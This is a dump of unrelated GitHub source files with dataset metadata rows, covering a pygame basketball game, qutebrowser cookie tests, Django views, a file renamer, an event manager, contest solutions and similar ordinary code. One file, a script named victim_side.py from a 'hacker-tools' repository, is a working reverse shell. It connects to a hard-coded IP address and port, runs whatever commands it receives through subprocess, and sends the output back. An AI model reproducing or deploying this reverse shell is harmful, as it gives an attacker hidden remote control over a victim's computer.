        if event.type == pygame.QUIT:
            play = False
    keys = pygame.key.get_pressed()
    if keys[pygame.K_LEFT]:
        basket_pos_x -= basket_speed
    if keys[pygame.K_RIGHT]:
        basket_pos_x += basket_speed
    # Vertical ball control kept disabled, as in the original:
    # if keys[pygame.K_UP]:
    #     y -= speed
    # if keys[pygame.K_DOWN]:
    #     y += speed
def update_ball_pos():
    # Drop the ball by `speed` pixels, refresh its cached scoring point
    # (+50 offset -- presumably the sprite centre; TODO confirm), and
    # respawn it if it has fallen off screen.
    global y, ball_rep_x, ball_rep_y
    y += speed
    ball_rep_x = x + 50
    ball_rep_y = y + 50
    initialise_ball()
def initialise_ball():
    # Once the ball passes the bottom edge, respawn it at the top at a
    # new random x position.
    global x, y
    if y > screen_lengte - radius:
        y = 0
        x = randint(0, screen_widhte)
def enforce_border():
    """Clamp the ball and the basket so they stay fully on screen.

    The basket's vertical position is never changed by input, so only
    its x coordinate needs clamping (as in the original).
    """
    global x, y, basket_pos_x, basket_pos_y
    x = max(0, min(x, screen_widhte - radius))
    y = max(0, min(y, screen_lengte - radius))
    basket_pos_x = max(0, min(basket_pos_x, screen_widhte - basket_width))
def show_images():
    # Redraw the frame (court, ball, basket) and refresh the hoop
    # hit-box from the basket's current position.
    global basket_rep_x, basket_rep_y
    screen.blit(Background, (0, 0))
    screen.blit(basketball, (x, y))
    # Debug guides (cross-hairs over the ball's scoring point):
    #pygame.draw.line(screen, black, (x + 50, 0), (x + 50, screen_lengte), 2)
    #pygame.draw.line(screen, black, (0, y + 50), (screen_widhte, y + 50), 2)
    basket_rep_x = [basket_pos_x + 31, basket_pos_x + 94]
    basket_rep_y = [basket_pos_y + 14, basket_pos_y + 20]
    screen.blit(basket, (basket_pos_x, basket_pos_y))
    # Debug guides (hoop hit-box edges):
    #pygame.draw.line(screen, black, (basket_pos_x + 31, 0), (basket_pos_x + 31, screen_lengte), 2)
    #pygame.draw.line(screen, black, (basket_pos_x + 94, 0), (basket_pos_x + 94, screen_lengte), 2)
    #pygame.draw.line(screen, black, (0, basket_pos_y + 14), (screen_widhte, basket_pos_y + 14), 2)
    #pygame.draw.line(screen, black, (0, basket_pos_y + 20), (screen_widhte, basket_pos_y + 20), 2)
def check_for_score():
    # Score when the ball's scoring point is inside the hoop hit-box;
    # reset the score when the ball crosses hoop height outside the box.
    global score
    if ball_rep_x in range(basket_rep_x[0], basket_rep_x[1]) and ball_rep_y in range(basket_rep_y[0], basket_rep_y[1]):
        score += 1
        # Alternative scoring sounds, kept disabled:
        #tick_2.play()
        #tick.play()
        tick_3.play()
    elif ball_rep_y in range(basket_rep_y[0], basket_rep_y[1]) and ball_rep_x not in range(basket_rep_x[0], basket_rep_x[1]):
        score = 0
        tick_nope.play()
    show_score()
def show_score():
    # Render the score in the top-left corner and echo it to stdout.
    score_disp = font.render("Score: " + str(score), True, black)
    screen.blit(score_disp, (text_x, text_y))
    print(score)
# Main loop at 60 FPS: input, physics, clamping, drawing, scoring.
while play:
    clock.tick(60)
    screen.fill(white)
    check_for_event()
    update_ball_pos()
    enforce_border()
    show_images()
    check_for_score()
    # Debug shapes, kept disabled:
    #pygame.draw.circle(screen, red, [x, y], radius)
    # pygame.draw.rect(screen, blue, [200, 200, 50, 100])
    pygame.display.flip()
pygame.quit()
| Yash-1047990/pythonProject3 | game.py | game.py | py | 3,998 | python | en | code | 0 | github-code | 13 |
72915472018 | import json
import pytest_bdd as bdd
bdd.scenarios('private.feature')
@bdd.then(bdd.parsers.parse('the cookie {name} should be set to {value}'))
def check_cookie(quteproc, name, value):
    """Check if a given cookie is set correctly.

    This assumes we're on the server cookies page.
    """
    content = quteproc.get_content()
    data = json.loads(content)
    # Echoed so the payload shows up in pytest's captured output.
    print(data)
    assert data['cookies'][name] == value
@bdd.then(bdd.parsers.parse('the cookie {name} should not be set'))
def check_cookie_not_set(quteproc, name):
    """Check if a given cookie is not set (on the server cookies page)."""
    content = quteproc.get_content()
    data = json.loads(content)
    # Echoed so the payload shows up in pytest's captured output.
    print(data)
    assert name not in data['cookies']
@bdd.then(bdd.parsers.parse('the file {name} should not contain "{text}"'))
def check_not_contain(tmpdir, name, text):
    """Check that a file inside the test's tmpdir lacks the given text."""
    path = tmpdir / name
    assert text not in path.read()
| qutebrowser/qutebrowser | tests/end2end/features/test_private_bdd.py | test_private_bdd.py | py | 886 | python | en | code | 9,084 | github-code | 13 |
17329364699 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Experiment with a gaussian naive bayes model with a variety of balancing techniques on the cleaned data set
"""
__author__ = "John Hoff"
__email__ = "john.hoff@braindonor.net"
__copyright__ = "Copyright 2019, John Hoff"
__license__ = "Creative Commons Attribution-ShareAlike 4.0 International License"
__version__ = "1.0"
from imblearn.combine import SMOTEENN
from imblearn.over_sampling import SMOTE
from imblearn.under_sampling import RandomUnderSampler
from sklearn.naive_bayes import GaussianNB
from utility import Runner
from model import load_clean_sample_data_frame, binned_geo_one_hot_data_mapper
sample = None
fit_increment = 10000
def test_gaussian_naive_bayes():
    """Run the Gaussian naive Bayes experiment on the cleaned data under
    four class-balancing strategies -- none, random under-sampling,
    SMOTE over-sampling and SMOTEENN combined sampling -- writing each
    result set to its own output path.

    The original repeated the Runner boilerplate four times; the
    variants only differ in the output suffix and the `sampling`
    argument, so they are driven from a table instead.
    """
    experiments = [
        ('basic', None),
        ('under_sampled', RandomUnderSampler()),
        ('over_sampled', SMOTE()),
        ('combine_sampled', SMOTEENN()),
    ]
    for suffix, sampling in experiments:
        runner = Runner(
            'model/experiment/output/gaussian_naive_bayes_%s' % suffix,
            load_clean_sample_data_frame(),
            'arrest',
            GaussianNB()
        )
        kwargs = dict(
            sample=sample,
            record_predict_proba=True,
            transformer=binned_geo_one_hot_data_mapper,
            fit_increment=fit_increment,
            n_jobs=1,
        )
        if sampling is not None:
            kwargs['sampling'] = sampling
        runner.run_classification_experiment(**kwargs)
if __name__ == '__main__':
test_gaussian_naive_bayes()
| theBraindonor/chicago-crime-arrests | model/experiment/gaussian_naive_bayes_model.py | gaussian_naive_bayes_model.py | py | 2,440 | python | en | code | 1 | github-code | 13 |
26053403339 | num=int(input("Enter number: "))
if num<0:
    print("Sorry! Enter a positive number. Please try again... ")
else:
    # `sum` shadows the builtin of the same name; renaming would also
    # require touching the final print that reports it.
    sum=0
    # Accumulate num + (num-1) + ... + 1 (i.e. num*(num+1)//2).
    while(num>0):
        sum+=num
        num-=1
print("Sum =", sum) | RheaDso/Python | SumOf15nos.py | SumOf15nos.py | py | 212 | python | en | code | 0 | github-code | 13 |
20307800056 | # 크롤링소스
from crawling import *
# 이메일발송소스
from send_email import *
# 메일내용 템플릿 소스
from template_email import *
import json
import datetime
def handler(event=None, context=None):
    """AWS Lambda entry point: scrape the daily report and e-mail it.

    Returns a Lambda-style dict with statusCode and body.
    """
    # 1. Run the crawler and collect the report data.
    data = crawling()
    # 2. Build the report timestamp.  hours=9 is added because this is
    #    meant to run on AWS Lambda, whose clock is UTC; Korean time
    #    (KST) is UTC+9.
    nowDate = datetime.datetime.now() + datetime.timedelta(hours=9)
    report_date = nowDate.strftime('%Y-%m-%d %H:%M:%S')
    # 3. Substitute the date and the data into the e-mail body template.
    email_body = template_email % (report_date, data)
    # 4. Actually send the e-mail.
    #    NOTE(review): `to=[]` passes an empty recipient list --
    #    presumably sendNaver supplies a default; confirm.
    rtn = sendNaver(to=[], subject='슈퍼투데이 오늘마감 리포트 (' + report_date + ')', body=email_body)
    if rtn == 'OK':
        return {
            'statusCode': 200,
            'body': 'SuperToday Crawling and sending email OK!'
        }
    else:
        return {
            'statusCode': 200,
            'body': 'Error ' + rtn
        }
# handler() | sjworldacademy/easyaws | python-crawling/app.py | app.py | py | 1,172 | python | ko | code | 0 | github-code | 13 |
44266284952 | W = float(input("가로: "))
# Remaining dimensions (prompts are Korean: 세로=depth, 높이=height;
# 가로=width was read just above) and the resulting volume.
D = float(input("세로: "))
H = float(input("높이: "))
V = W * D * H
if (V < 0):
    # Only reachable when an odd number of the entered dimensions is
    # negative.
    print("Error has occurred. Close the program.")
elif (V > 120):
    print("It's too heavy.")
else:
    # fix: the message read "total lenght" although V is a volume.
    print("total volume: %f" %V)
    print("Do you want to calculate the bill? Enter Y/N")
    answer = str(input())
    if (answer == "N"):
        print ("Exit the program.")
    else:
        # Bill brackets by volume; anything else than "N" counts as yes.
        if (V <= 80):
            print("5$")
        elif (80 < V <= 100):
            print("8$")
        elif (100 < V <= 120):
            print("10$")
| hymnstar/cau_oss_python_03 | volume_calc.py | volume_calc.py | py | 571 | python | en | code | 0 | github-code | 13 |
6949031404 | # Definition for a binary tree node.
class TreeNode:
    # Minimal LeetCode-style binary tree node.
    def __init__(self, x):
        self.val = x  # node payload
        self.left = None  # left child (TreeNode or None)
        self.right = None  # right child (TreeNode or None)
from typing import *
from collections import deque
class Solution:
    def addOneRow(self, root: TreeNode, v: int, d: int) -> TreeNode:
        """Insert a full row of value-v nodes at depth d (LeetCode 623).

        Every node at depth d-1 receives two new value-v children; its
        former left subtree hangs off the new left child and its former
        right subtree off the new right child.
        """
        if d==1:
            # New row above the root: the whole tree becomes the left child.
            new_root=TreeNode(v)
            new_root.left=root
            return new_root
        que=deque([])
        que.append(root)
        heads=[]
        cnt=1
        # BFS level by level; `cnt` is the depth of the level about to be
        # collected, so after the break `heads` holds the depth d-1 nodes.
        while que:
            len1=len(que)
            cnt+=1
            heads=[]
            for i in range(len1):
                heads.append(que.popleft())
            if cnt==d:
                break
            for node in heads:
                if node.left:
                    que.append(node.left)
                if node.right:
                    que.append(node.right)
        for head in heads:
            # Splice the new nodes between `head` and its old subtrees.
            l,r=head.left,head.right
            head.left,head.right=TreeNode(v),TreeNode(v)
            head.left.left=l
            head.right.right=r
        return root
if __name__ == '__main__':
    # Ad-hoc smoke test: tree 4 -> 2 -> (3, 1); insert value 1 at depth 3.
    sol=Solution()
    node1=TreeNode(4)
    node2=TreeNode(2)
    node3=TreeNode(3)
    node4=TreeNode(1)
    node1.left=node2
    node2.left=node3
    node2.right=node4
    sol.addOneRow(node1,1,3)
| Xiaoctw/LeetCode1_python | 树/在二叉树中增加一行_623.py | 在二叉树中增加一行_623.py | py | 1,289 | python | en | code | 0 | github-code | 13 |
70757049939 | '''
Напишите функцию группового переименования файлов. Она должна:
принимать параметр желаемое конечное имя файлов. При переименовании в конце имени
добавляется порядковый номер.
принимать параметр количество цифр в порядковом номере.
принимать параметр расширение исходного файла. Переименование должно работать
только для этих файлов внутри каталога.
принимать параметр расширение конечного файла.
принимать диапазон сохраняемого оригинального имени. Например для диапазона [3, 6]
берутся буквы с 3 по 6 из исходного имени файла. К ним прибавляется желаемое конечное имя,
если оно передано. Далее счётчик файлов и расширение.
'''
import os
from pathlib import Path
# end_name - параметр <желаемое конечное имя файлов>
# count_serial_number - параметр <количество цифр в порядковом номере>
# source_file_extension - параметр <расширение исходного файла>
# end_file_extension - параметр <расширение конечного файла>
# range_original_name - диапазон <сохраняемого оригинального имени>
def group_renaming_files(dir_path: str, end_name: str, count_serial_number: int,
                         source_file_extension: str, end_file_extension: str,
                         range_original_name: tuple):
    """Bulk-rename files in `dir_path`.

    Only files whose extension equals `source_file_extension` (without
    dot) are touched.  The new name is: the slice of the original stem
    given by `range_original_name`, plus `end_name`, an underscore, a
    zero-padded counter of `count_serial_number` digits, and
    `end_file_extension` (appended verbatim, so include the dot).
    Returns a Russian summary string with the rename count.

    Robustness fixes vs. the original: names without a dot are skipped
    instead of crashing, and multi-dot names are split on the *last*
    dot (``split('.')`` raised ValueError for them); the useless
    ``file = ()`` initialiser was dropped.
    """
    f_count = 0
    for file in os.listdir(dir_path):
        if '.' not in file:
            continue
        file_name, file_ext = file.rsplit('.', 1)
        if file_ext != source_file_extension:
            continue
        kept = file_name[range_original_name[0]:range_original_name[1]]
        new_name = f'{kept + end_name}_{f_count + 1:0{count_serial_number}}{end_file_extension}'
        f_count += 1
        print(f'{file} -> {new_name}')
        os.rename(os.path.join(dir_path, file), os.path.join(dir_path, new_name))
    # Russian pluralisation of "file(s) renamed by the template".
    if f_count == 1:
        text = 'файл переименован по шаблону'
    elif f_count in (2, 3, 4):
        text = 'файла переименованы по шаблону'
    else:
        text = 'файлов переименованы по шаблону'
    return f'{f_count} {text} '
if __name__=='__main__':
print(group_renaming_files('test_dir', end_name='_replacement', count_serial_number=2,\
source_file_extension='txt', end_file_extension='.xls', range_original_name=(0,3)))
'''
result:
data.txt -> dat_replacement_01.xls
file_01.txt -> fil_replacement_02.xls
notepad.txt -> not_replacement_03.xls
3 файла переименованы по шаблону
''' | leonid-korolev/Immersion_in_Python_homeworks | homeworks/homework_7/renaming_files.py | renaming_files.py | py | 3,383 | python | ru | code | 0 | github-code | 13 |
8815555050 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def preorderTraversal(self, root):
        """Return the preorder (root, left, right) traversal of a tree.

        :type root: TreeNode
        :rtype: List[int]
        """
        values = []

        def visit(node):
            # Root first, then the whole left subtree, then the right.
            if node is None:
                return
            values.append(node.val)
            visit(node.left)
            visit(node.right)

        visit(root)
        return values
| rando3/leetcode-python | Stacks and Queues/preorderTraversal.py | preorderTraversal.py | py | 639 | python | en | code | 0 | github-code | 13 |
27061728320 | import logging
import numpy as np
import pandas as pd
import streamlit as st
from bertopic import BERTopic
from bertopic.backend._utils import select_backend
from sentence_transformers import SentenceTransformer
from topics.np import load_numpy
logging.getLogger(__name__).addHandler(logging.NullHandler())
def _filter_dataframe(df, column="Topic", values=None):
if values is None:
values = [-1] # Remove this index
return df[df[column].isin(values) == False]
def _sort_probabilities_by_topic(probs: np.ndarray):
highest_probs_per_idx = []
_shape = probs.shape
num_vals = range(len(probs))
num_topics = 1 if len(_shape) == 1 else _shape[1]
for topic in range(num_topics):
prob = probs[:, topic]
probs_sorted = sorted(num_vals, reverse=True, key=lambda idx: prob[idx])
highest_probs_per_idx.append(probs_sorted)
return np.array(highest_probs_per_idx).T
def _remove_first_underline(df: pd.DataFrame, column: str = "Name"):
df[column] = df.apply(lambda d: " ".join(d[column].split("_")[1:]), axis=1)
return df
def replace_symbol(df: pd.DataFrame, column: str = "Name", find="", rep=""):
    """Literal substring replacement applied to every value in `column`
    (modifies `df` in place and returns it)."""
    df[column] = df[column].map(lambda value: value.replace(find, rep))
    return df
def _remove_underlines(df: pd.DataFrame, column: str = "Name"):
    """Strip the first underscore-separated segment and turn all
    remaining underscores in `column` into spaces."""
    without_prefix = _remove_first_underline(df, column=column)
    return replace_symbol(without_prefix, column, "_", " ")
# -------
@st.cache(allow_output_mutation=True)
def get_df(input_data="biblioteksplaner.csv"):
    # Load the corpus CSV, force every column to str and drop the unused
    # `meta` column.  Cached by Streamlit across reruns.
    df = pd.read_csv(input_data)
    df = df.astype(str)
    df.drop(columns="meta", inplace=True)
    return df
@st.cache(allow_output_mutation=True)
def get_topics(model_path="models/model_mp_30/"):
    # Per-document topic assignments saved next to the trained model.
    return load_numpy(model_path + "topics.npy", as_list=True)
@st.cache(allow_output_mutation=True)
def get_probs(model_path="models/model_mp_30/"):
    # Document-topic probability matrix, kept as an ndarray.
    return load_numpy(model_path + "probs.npy", as_list=False)
@st.cache(allow_output_mutation=True)
def get_probs_index_by_topic(model_path="models/model_mp_30/"):
    # Document indices ranked by descending probability, one column per
    # topic (see _sort_probabilities_by_topic).
    probs = load_numpy(model_path + "probs.npy", as_list=False)
    return _sort_probabilities_by_topic(probs)
@st.cache(allow_output_mutation=True)
def get_topics_per_region(model_path="models/model_mp_30/"):
    # Precomputed per-region topic table, minus the -1 outlier topic.
    topics_per_region = pd.read_csv(model_path + "topics_per_region.csv")
    return _filter_dataframe(topics_per_region)
@st.cache(allow_output_mutation=True)
def get_topics_per_municipality(model_path="models/model_mp_30/"):
    # Precomputed per-municipality topic table, minus the -1 outlier topic.
    topics_per_municipality = pd.read_csv(model_path + "topics_per_municipality.csv")
    return _filter_dataframe(topics_per_municipality)
@st.cache(allow_output_mutation=True)
def get_topic_model(model_path="models/model_mp_30/"):
    # The explicit embedding backend is intentionally disabled; the
    # serialized model is loaded and used as-is.
    # model = SentenceTransformer(model_path) # , device="cpu")
    # logging.error("Loaded SentenceTransformer")
    # model = select_backend(sentence_model)
    logging.info("Loading BERTopic")
    topic_model = BERTopic.load(model_path + "model") # , embedding_model=model)
    logging.info("Loaded BERTopic")
    return topic_model
@st.cache(allow_output_mutation=True)
def get_topic_info(model_path):
    # Columns = (Topic, Count, Name)
    # Build the topic summary table shown in the UI: topic id, its
    # space-joined top words ("Words") and its document count
    # ("Frequency"); the -1 outlier topic is dropped.
    topic_model = get_topic_model(model_path=model_path)
    df: pd.DataFrame = topic_model.get_topic_info()
    df = _remove_first_underline(df, "Name")
    df = _filter_dataframe(df)
    df = df[["Topic", "Name", "Count"]] # original name from topic_info
    df.rename(
        columns={"Topic": "Topic", "Name": "Words", "Count": "Frequency"},
        inplace=True,
    )
    df.reset_index(inplace=True, drop=True)
    return df
| MarkusSagen/paai_skr_demo | web/initialize.py | initialize.py | py | 3,614 | python | en | code | 0 | github-code | 13 |
24889833165 | import os, socket, sys, subprocess
from threading import Thread
from colorama import Fore
# Server details
SERVER_HOST = "192.168.1.68"
SERVER_PORT = 4000
seperator_token = "<SEP>"
GREEN = Fore.GREEN
YELLOW = Fore.YELLOW
RED = Fore.RED
RESET = Fore.RESET
s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))
cwd = os.getcwd()
s.send(cwd.encode())
command = ""
while command.lower() != "exit":
cwd = os.getcwd()
command = s.recv(1024).decode()
splitted_command = command.split()
if len(splitted_command) > 0 and splitted_command[0].lower() == "cd":
try:
os.chdir(' '.join(splitted_command[1:]))
cwd = os.getcwd()
s.send(f"{YELLOW}{''}<SEP>{GREEN}{cwd}{RESET}".encode())
except Exception as e:
s.send(f"{RED}Error: {e}{RESET}".encode())
else:
try:
output = subprocess.getoutput(command)
s.send(f"{YELLOW}{output}{RESET}<SEP>{GREEN}{cwd}{RESET}".encode())
except Exception as e:
s.send(f"{RED}Error: {e}{RESET}".encode())
output = ""
sys.exit() | rip4ldi/hacker-tools | reverse_shell/victim_side.py | victim_side.py | py | 1,116 | python | en | code | 0 | github-code | 13 |
35981698272 | # -*- coding: UTF-8 -*-
# author:@Jack.Wang
from threading import *
from queue import Queue, Empty
class EventManager:
    """Threaded publish/subscribe event dispatcher.

    Events are enqueued by SendEvent() and consumed by a worker thread,
    which calls every handler registered for the event's ``type_``.
    """

    def __init__(self):
        self.__eventQueue = Queue()
        self.__active = False
        self.__thread = Thread(target=self.__Run)
        # type_ -> list of handler callables; one event type can fan out
        # to many listeners.
        self.__handlers = {}

    def __Run(self):
        # Worker loop.  The 1-second get() timeout lets the loop re-check
        # __active, so Stop() can terminate the thread on an empty queue.
        while self.__active == True:
            try:
                event = self.__eventQueue.get(block=True, timeout=1)
                self.__EventProcess(event)
            except Empty:
                pass

    def Start(self):
        # NOTE(review): a Thread object can only be started once, so
        # Start() after Stop() raises RuntimeError.
        self.__active = True
        self.__thread.start()

    def __EventProcess(self, event):
        # Dispatch to every handler registered for this event type.
        if event.type_ in self.__handlers:
            for handler in self.__handlers[event.type_]:
                handler(event)

    def Stop(self):
        self.__active = False
        self.__thread.join()

    def AddEventLister(self, type_, handler):
        """Register `handler` for events of `type_`; duplicates are
        ignored.  (setdefault replaces the original duplicated
        try/except-KeyError bookkeeping.)"""
        handlerList = self.__handlers.setdefault(type_, [])
        if handler not in handlerList:
            handlerList.append(handler)

    def RemoveEventListerner(self, type_, handler):
        """Unregister `handler`; drop the type entirely once its handler
        list is empty.  Unknown types are silently ignored."""
        try:
            handlerList = self.__handlers[type_]
            if handler in handlerList:
                handlerList.remove(handler)
            if not handlerList:
                del self.__handlers[type_]
        except KeyError:
            pass

    def SendEvent(self, event):
        self.__eventQueue.put(event)
class Event:
    """Message object routed through EventManager.

    ``type_`` selects which handlers receive it; ``dict`` is a free-form
    payload the sender may populate before dispatch.
    """

    def __init__(self, type_=None):
        self.type_ = type_
        self.dict = {}
42045622698 | import sys
import itertools
# Competitive-programming boilerplate: allow very deep recursion.
sys.setrecursionlimit(10 ** 8)
# Fast stdin helpers: one int, a list of ints, and a stripped string per line.
ini = lambda: int(sys.stdin.readline())
inl = lambda: [int(x) for x in sys.stdin.readline().split()]
ins = lambda: sys.stdin.readline().rstrip()
# Debug printer: writes to stderr in yellow so it never pollutes the answer.
debug = lambda *a, **kw: print("\033[33m", *a, "\033[0m", **dict(file=sys.stderr, **kw))
def solve():
    """Return the third-largest distinct sum of any three of the input values.

    Reads one line of whitespace-separated integers from stdin via ``inl``.
    """
    v = inl()
    # Collect every distinct 3-element sum. A set generalizes the previous
    # fixed-size boolean table (501 slots): results are identical for all
    # inputs the old code handled, and sums above 500 no longer crash.
    sums = {sum(triple) for triple in itertools.combinations(v, 3)}
    # Sorted ascending, the third element from the end is the 3rd largest.
    return sorted(sums)[-3]


print(solve())
| keijak/comp-pub | atcoder/abc028/C/main.py | main.py | py | 516 | python | en | code | 0 | github-code | 13 |
3082393025 | import pytest
from django.core.exceptions import ValidationError
from dataservices import models
from dataservices.tests.factories import (
CIAFactBookFactory,
ConsumerPriceIndexFactory,
CountryFactory,
EaseOfDoingBusiness,
GDPPerCapitaFactory,
IncomeFactory,
InternetUsageFactory,
MetadataFactory,
SuggestedCountriesFactory,
WorldEconomicOutlookByCountryFactory,
)
# FIX: the django_db marker was applied twice (once above and once below the
# parametrize decorator); applying it once is sufficient.
@pytest.mark.django_db
@pytest.mark.parametrize(
    'factory',
    (
        ConsumerPriceIndexFactory,
        EaseOfDoingBusiness,
        GDPPerCapitaFactory,
        IncomeFactory,
        InternetUsageFactory,
    ),
)
def test_model_to_str(factory):
    """Each yearly country statistic stringifies as '<country name>:<year>'."""
    create_model = factory()
    assert str(create_model) == f'{create_model.country.name}:{create_model.year}'
@pytest.mark.django_db
def test_suggested_country_hs_code():
    """A SuggestedCountries row stringifies to its HS code."""
    suggested = SuggestedCountriesFactory()
    assert str(suggested) == str(suggested.hs_code)
@pytest.mark.django_db
def test_cia_factbook_country_name():
    """A CIA Factbook record stringifies to its country name."""
    factbook_entry = CIAFactBookFactory()
    assert str(factbook_entry) == factbook_entry.country_name
@pytest.mark.django_db
def test_world_economic_outlook_by_country_is_projection():
    """Figures count as projections only for years strictly after the cutoff."""
    before_cutoff = WorldEconomicOutlookByCountryFactory(year=1999, estimates_start_after=2000)
    assert before_cutoff.is_projection is False
    at_cutoff = WorldEconomicOutlookByCountryFactory(year=2000, estimates_start_after=2000)
    assert at_cutoff.is_projection is False
    after_cutoff = WorldEconomicOutlookByCountryFactory(year=2001, estimates_start_after=2000)
    assert after_cutoff.is_projection is True
@pytest.mark.django_db
def test_metadata_view_name():
    """A Metadata record stringifies to its view_name."""
    record = MetadataFactory(view_name='MyView')
    assert str(record) == 'MyView'
@pytest.mark.django_db
def test_uk_free_trade_agreement_no_name():
    """clean_fields() fails without a country and backfills name from it once set."""
    agreement = models.UKFreeTradeAgreement()
    with pytest.raises(ValidationError):
        agreement.clean_fields()
    agreement.country = CountryFactory()
    assert agreement.name == ''
    agreement.clean_fields()
    assert agreement.name == agreement.country.name
12405806694 | from django.shortcuts import render,redirect
from django.http import Http404
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.decorators import login_required
from .models import Profile,Project,Rating
from .forms import UploadProjectForm,AddProfileForm,AddRatingForm
from .filters import ProjectFilter
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework import status
from .serializer import ProfileSerializer,ProjectSerializer
from .permissions import IsAdminOrReadOnly,IsAuthenticatedOrReadOnly
# Create your views here.
def home(request):
    """Landing page showing the first uploaded project."""
    featured = Project.objects.first()
    return render(request, 'home.html', {"project": featured})
def about(request):
    """Render the static About page."""
    return render(request, 'about.html')
@login_required(login_url='/accounts/login/')
def project(request):
    """List every uploaded project for signed-in users."""
    uploaded = Project.objects.all()
    return render(request, 'project.html', {"projects": uploaded})
@login_required(login_url='/accounts/login/')
def projectdetail(request, project_id):
    """Show a single project, raising Http404 when the id is unknown."""
    try:
        selected = Project.objects.get(id=project_id)
    except ObjectDoesNotExist:
        raise Http404()
    return render(request, 'projectdetail.html', {"project": selected})
@login_required(login_url='/accounts/login/')
def uploadproject(request):
    """Let the signed-in user publish a new project.

    Invalid POSTs fall through to re-render the bound form with its errors.
    """
    if request.method == 'POST':
        form = UploadProjectForm(request.POST, request.FILES)
        if form.is_valid():
            # Attach the current user as owner before the first save.
            project = form.save(commit=False)
            project.owner = request.user
            project.save()
            return redirect('project')
    else:
        form = UploadProjectForm()
    return render(request, 'newproject.html', {"form": form})
@login_required(login_url='/accounts/login/')
def viewprofile(request):
    """Show the signed-in user's profile together with their projects."""
    user = request.user
    context = {
        "current_user": user,
        "profile": Profile.objects.filter(user=user),
        "projects": Project.objects.filter(owner=user),
    }
    return render(request, 'profile.html', context)
@login_required(login_url='/accounts/login/')
def addprofile(request):
    """Create a profile record for the signed-in user.

    Invalid POSTs fall through to re-render the bound form with its errors.
    """
    if request.method == 'POST':
        form = AddProfileForm(request.POST, request.FILES)
        if form.is_valid():
            # Bind the profile to the current user before the first save.
            profile = form.save(commit=False)
            profile.user = request.user
            profile.save()
            return redirect('profile')
    else:
        form = AddProfileForm()
    return render(request, 'newprofile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def filterproject(request):
    """Search projects via the ProjectFilter filterset driven by GET params.

    NOTE: the old ``if request is None`` guard was dead code — Django always
    passes a request to views — and it returned a bare QuerySet, which is not
    a valid HTTP response, so it has been removed.
    """
    filter_list = Project.objects.all()
    project_filter = ProjectFilter(request.GET, queryset=filter_list)
    return render(request, 'searchproject.html', {"filter": project_filter})
@login_required(login_url='/accounts/login/')
def addrating(request, project_id):
    """Collect a design/usability/content rating for one project.

    Invalid POSTs fall through to re-render the bound form with its errors.
    (The previous unconditional ``form = AddRatingForm()`` before the branch
    was always overwritten and has been removed.)
    """
    project = Project.objects.get(id=project_id)
    current_user = request.user
    if request.method == 'POST':
        form = AddRatingForm(request.POST)
        if form.is_valid():
            new_rating = Rating(
                design=form.cleaned_data.get("design"),
                usability=form.cleaned_data.get("usability"),
                content=form.cleaned_data.get("content"),
                human=current_user,
                project=project,
            )
            new_rating.save()
            return redirect('project')
    else:
        form = AddRatingForm()
    return render(request, 'rating.html', {'form': form, 'project': project, 'current_user': current_user})
@login_required(login_url='/accounts/login/')
def calcratings(request, project_id):
    """Show a project's ratings plus its aggregate and per-category scores."""
    rated_project = Project.objects.get(id=project_id)
    ratings = Rating.objects.filter(project=rated_project)
    # "primer" is the context key the score.html template expects.
    context = {
        "primer": rated_project,
        "ratings": ratings,
        "proscore": Project.score(project_id),
        "designscore": Project.designer(project_id),
        "usabilityscore": Project.usable(project_id),
        "contentscore": Project.contenter(project_id),
    }
    return render(request, 'score.html', context)
class ProjectList(APIView):
    """List all projects, or create one (writes require authentication)."""

    permission_classes = (IsAuthenticatedOrReadOnly,)

    def get(self, request, format=None):
        serializer = ProjectSerializer(Project.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        serializer = ProjectSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
class ProfileList(APIView):
    """List all profiles, or create one (writes restricted to admins)."""

    permission_classes = (IsAdminOrReadOnly,)

    def get(self, request, format=None):
        serializer = ProfileSerializer(Profile.objects.all(), many=True)
        return Response(serializer.data)

    def post(self, request, format=None):
        serializer = ProfileSerializer(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_201_CREATED)
class ProjectDescription(APIView):
    """Retrieve a single project by primary key."""

    # BUG FIX: was `(IsAuthenticatedOrReadOnly)` — without the trailing comma
    # this is a bare class, not a tuple, and DRF fails when it iterates
    # permission_classes to instantiate each permission.
    permission_classes = (IsAuthenticatedOrReadOnly,)

    def get_project(self, pk):
        """Fetch the project or raise Http404 when it does not exist."""
        try:
            return Project.objects.get(pk=pk)
        except Project.DoesNotExist:
            # BUG FIX: was `return Http404`, which handed the exception class
            # back to the caller instead of producing a 404 response.
            raise Http404

    def get(self, request, pk, format=None):
        project = self.get_project(pk)
        serializers = ProjectSerializer(project)
        return Response(serializers.data)
class ProfileDescription(APIView):
    """Retrieve a single profile by primary key (admin-only writes)."""

    permission_classes = (IsAdminOrReadOnly,)

    def get_profile(self, pk):
        """Fetch the profile or raise Http404 when it does not exist."""
        try:
            return Profile.objects.get(pk=pk)
        except Profile.DoesNotExist:
            # BUG FIX: was `return Http404`, which handed the exception class
            # back to the caller instead of producing a 404 response.
            raise Http404

    def get(self, request, pk, format=None):
        project = self.get_profile(pk)
        serializers = ProfileSerializer(project)
        return Response(serializers.data)
#Imports random, pickle, sys, pygame and time modules
import random, pickle, sys, pygame, time
#Imports locals for use in adding input
from pygame.locals import *
#Initialize pygame
pygame.init()
#Initialises pygame music mixer
pygame.mixer.init()
#Loads music file
pygame.mixer.music.load('floyd.ogg')
#Plays song indefinitely
pygame.mixer.music.play(-1)
#Set variables for width and height of window
width = 1200
height = 600
#Set colours in variables
black = (0,0,0)
white = (255,255,255)
aqua_blue = (113,221,229)
#Initialise variables
num_ques = 0
used_questions = []
overall_score = 0
song_time = 0
#Create screen in window
screen = pygame.display.set_mode((width,height))
#Set caption of window
pygame.display.set_caption("IQ Test")
#Get clock
clock = pygame.time.Clock()
#Set FPS variable
FPS = 60
#Set variable for FPS clock
